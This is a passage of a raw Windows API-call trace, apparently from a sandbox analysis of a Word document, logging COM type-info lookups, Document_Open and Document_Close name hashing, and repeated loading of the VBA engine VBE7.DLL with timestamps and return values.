ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc5, ppFuncDesc=0x147248, pDummy=0xe0 | out: ppFuncDesc=0x147248, pDummy=0xe0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc6, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc7, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc8, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc9, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xca, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.855] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcb, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.855] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcc, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcd, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xce, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcf, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd0, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd1, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd2, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd3, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd5, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd6, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd7, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd8, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.856] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd9, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.856] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xda, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdb, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdc, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdd, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xde, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdf, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe0, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe1, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe2, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe3, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe5, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe6, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe7, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe8, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe9, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.857] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xea, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.857] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xeb, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xec, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xed, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xee, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xef, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf0, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf1, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf2, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf3, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf5, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf6, ppFuncDesc=0x147248, pDummy=0x1800 | out: ppFuncDesc=0x147248, pDummy=0x1800) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf7, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf8, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.858] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.858] ITypeInfo2:GetCustData (in: This=0x695c8c0, GUID=0x7fee3b2d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x147278 | out: pVarVal=0x147278*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0071.858] IUnknown:Release (This=0x695c8c0) returned 0x2 [0071.858] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x147270, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0071.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x147180, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0071.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0071.859] IMalloc:Realloc (This=0x7fefec05380, pv=0xafb7b70, cb=0x62) returned 0x6950c00 [0071.859] _mbscpy_s (in: _Dst=0x1474a0, _DstSizeInBytes=0xe, _Src=0xa9d2c5e | out: _Dst=0x1474a0) returned 0x0 [0071.859] _mbscpy_s (in: _Dst=0x1474a9, _DstSizeInBytes=0x5, _Src=0x147650 | out: _Dst=0x1474a9) returned 0x0 [0071.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0075.898] GetCapture () returned 0x0 [0075.898] GetCursorPos (in: lpPoint=0x14f520 | out: lpPoint=0x14f520*(x=630, y=293)) returned 1 [0075.898] WindowFromPoint (Point=0x12500000276) returned 0x40154 [0075.898] GetWindowThreadProcessId (in: hWnd=0x40154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0075.898] SendMessageA (hWnd=0x40154, Msg=0x84, wParam=0x0, lParam=0x1250276) returned 0x1 [0075.898] SendMessageA (hWnd=0x40154, Msg=0x20, wParam=0x40154, lParam=0x2000001) returned 0x0 [0236.549] ITypeInfo:RemoteGetDocumentation (in: This=0x695ca20, memid=6, refPtrFlags=0x1498f0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d4f2cc0ccc898d | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d4f2cc0ccc898d) returned 0x0 [0236.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Close", cchWideChar=6, lpMultiByteStr=0x149940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Close", lpUsedDefaultChar=0x0) returned 6 [0236.550] _mbscpy_s (in: _Dst=0x149790, _DstSizeInBytes=0xf, _Src=0xa9d2c5e | out: _Dst=0x149790) returned 0x0 [0236.550] _mbscpy_s (in: _Dst=0x149799, _DstSizeInBytes=0x6, _Src=0x149940 | out: _Dst=0x149799) returned 0x0 [0236.550] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Close") returned 0x105c37 [0236.642] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.642] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.644] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002ce) returned 1 [0236.644] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.644] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x23d) returned 0x7fee38eafec [0236.644] GetCurrentProcess () returned 0xffffffffffffffff [0236.644] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5b84, dwSize=0x43) returned 1 [0236.645] RtlLookupFunctionEntry (in: ControlPc=0xafb5b84, ImageBase=0x1496b8, HistoryTable=0x1496c0 | out: ImageBase=0x1496b8, HistoryTable=0x1496c0) returned 0xafb5bd4 [0236.645] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.645] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.645] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.645] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002cf) returned 1 [0236.645] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.646] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x23f) returned 0x7fee38eb100 [0236.646] GetCurrentProcess () returned 0xffffffffffffffff [0236.646] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5c4c, dwSize=0x43) returned 1 [0236.646] RtlLookupFunctionEntry (in: ControlPc=0xafb5c4c, ImageBase=0x1496b8, HistoryTable=0x1496c0 | out: ImageBase=0x1496b8, HistoryTable=0x1496c0) returned 0xafb5c9c [0236.646] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.646] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.646] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.647] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d0) returned 1 [0236.647] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.647] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x248) returned 0x7fee3a93440 [0236.647] GetCurrentProcess () returned 0xffffffffffffffff [0236.647] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5fc4, dwSize=0x3d) returned 1 [0236.647] RtlLookupFunctionEntry (in: ControlPc=0xafb5fc4, ImageBase=0x1496b8, HistoryTable=0x1496c0 | out: ImageBase=0x1496b8, HistoryTable=0x1496c0) returned 0xafb6010 [0236.647] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.647] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.648] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.648] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d1) returned 1 [0236.648] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.649] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x266) returned 0x7fee3a93304 [0236.649] GetCurrentProcess () returned 0xffffffffffffffff [0236.649] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6084, dwSize=0x3d) returned 1 [0236.649] RtlLookupFunctionEntry (in: ControlPc=0xafb6084, ImageBase=0x1496b8, HistoryTable=0x1496c0 | out: ImageBase=0x1496b8, HistoryTable=0x1496c0) returned 0xafb60d0 [0236.649] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.649] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.649] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.649] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d2) returned 1 [0236.649] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.650] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x272) returned 0x7fee3ac2a80 [0236.650] GetCurrentProcess () returned 0xffffffffffffffff [0236.650] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafdb864, dwSize=0x4b) returned 1 [0236.650] RtlLookupFunctionEntry (in: ControlPc=0xafdb864, ImageBase=0x1496b8, HistoryTable=0x1496c0 | out: ImageBase=0x1496b8, HistoryTable=0x1496c0) returned 0xafdb8bc [0236.651] free (_Block=0x2519390) [0236.651] CExposedDocFile::Release () returned 0x4 [0236.651] CExposedDocFile::Release () returned 0x3 [0236.651] CExposedDocFile::Release () returned 0x2 [0236.651] CExposedDocFile::Release () returned 0x1 [0236.652] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.652] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.652] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d3) returned 1 [0236.652] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.653] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x23d) returned 0x7fee38eafec [0236.653] GetCurrentProcess () returned 0xffffffffffffffff [0236.653] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5b84, dwSize=0x43) returned 1 [0236.653] RtlLookupFunctionEntry (in: ControlPc=0xafb5b84, ImageBase=0x149658, HistoryTable=0x149660 | out: ImageBase=0x149658, HistoryTable=0x149660) returned 0xafb5bd4 [0236.653] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.653] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.653] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.654] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d4) returned 1 [0236.654] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.654] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x23f) returned 0x7fee38eb100 [0236.654] GetCurrentProcess () returned 0xffffffffffffffff [0236.654] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5c4c, dwSize=0x43) returned 1 [0236.654] RtlLookupFunctionEntry (in: ControlPc=0xafb5c4c, ImageBase=0x149658, HistoryTable=0x149660 | out: ImageBase=0x149658, HistoryTable=0x149660) returned 0xafb5c9c [0236.654] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.654] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.654] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.655] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d5) returned 1 [0236.655] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.655] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x248) returned 0x7fee3a93440 [0236.655] GetCurrentProcess () returned 0xffffffffffffffff [0236.655] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5fc4, dwSize=0x3d) returned 1 [0236.655] RtlLookupFunctionEntry (in: ControlPc=0xafb5fc4, ImageBase=0x149658, HistoryTable=0x149660 | out: ImageBase=0x149658, HistoryTable=0x149660) returned 0xafb6010 [0236.655] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.655] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.655] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.656] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d6) returned 1 [0236.656] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.656] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x266) returned 0x7fee3a93304 [0236.656] GetCurrentProcess () returned 0xffffffffffffffff [0236.656] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6084, dwSize=0x3d) returned 1 [0236.656] RtlLookupFunctionEntry (in: ControlPc=0xafb6084, ImageBase=0x149658, HistoryTable=0x149660 | out: ImageBase=0x149658, HistoryTable=0x149660) returned 0xafb60d0 [0236.657] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.657] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.657] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3780000 [0236.657] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10018bca000002d7) returned 1 [0236.657] SetErrorMode (uMode=0x8001) returned 0x8001 [0236.658] GetProcAddress (hModule=0x7fee3780000, lpProcName=0x272) returned 0x7fee3ac2a80 [0236.658] GetCurrentProcess () returned 0xffffffffffffffff [0236.658] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafdb864, dwSize=0x4b) returned 1 [0236.658] RtlLookupFunctionEntry (in: ControlPc=0xafdb864, ImageBase=0x149658, HistoryTable=0x149660 | out: ImageBase=0x149658, HistoryTable=0x149660) returned 0xafdb8bc [0236.658] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x14a128, pDummy=0xaf3dd60 | out: ppTypeAttr=0x14a128, pDummy=0xaf3dd60*=0x17) returned 0x0 [0236.658] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0236.658] IUnknown:Release (This=0x695ca20) returned 0x5 [0236.658] IMalloc:Free (This=0x7fefec05380, pv=0x646f6b0) [0236.659] free (_Block=0x251cb60) [0236.659] GetCurrentThreadId () returned 0x8ec [0236.659] SetCursor (hCursor=0x10007) returned 0x10003 [0236.659] CExposedDocFile::Release () returned 0x1 [0236.659] free (_Block=0x2fcdf60) [0236.659] free (_Block=0x2518300) [0236.659] CExposedDocFile::Release () returned 0x0 [0236.659] CExposedDocFile::Release () returned 0x0 [0236.659] free (_Block=0x251c9f0) [0236.659] free (_Block=0x2fcd5d0) [0236.659] free (_Block=0x2fcd5a0) [0236.659] malloc (_Size=0x18) returned 0x2519b10 [0236.659] free (_Block=0x251a590) [0236.660] free (_Block=0x2fccfc0) [0236.660] free (_Block=0x251a570) [0236.660] free (_Block=0x251a3e0) [0236.660] free (_Block=0x251a7f0) [0236.660] free (_Block=0x2518510) [0236.660] free (_Block=0x251a7d0) [0236.660] free (_Block=0x251a640) [0236.660] free (_Block=0x251aa50) [0236.660] free (_Block=0x2518470) [0236.660] free (_Block=0x251aa30) [0236.660] free (_Block=0x251a8a0) [0236.660] GetCurrentThreadId () returned 0x8ec [0236.660] GetCurrentThreadId () returned 0x8ec [0236.660] free (_Block=0x2518250) [0236.665] IMalloc:Free (This=0x7fefec05380, pv=0xaf61150) [0236.665] IMalloc:Free (This=0x7fefec05380, pv=0x646fc30) [0236.665] IMalloc:Free (This=0x7fefec05380, pv=0x68e3a00) [0236.665] IMalloc:Free (This=0x7fefec05380, pv=0x646f8f0) [0236.665] IMalloc:Free (This=0x7fefec05380, pv=0x646fb30) [0236.666] IMalloc:Free (This=0x7fefec05380, 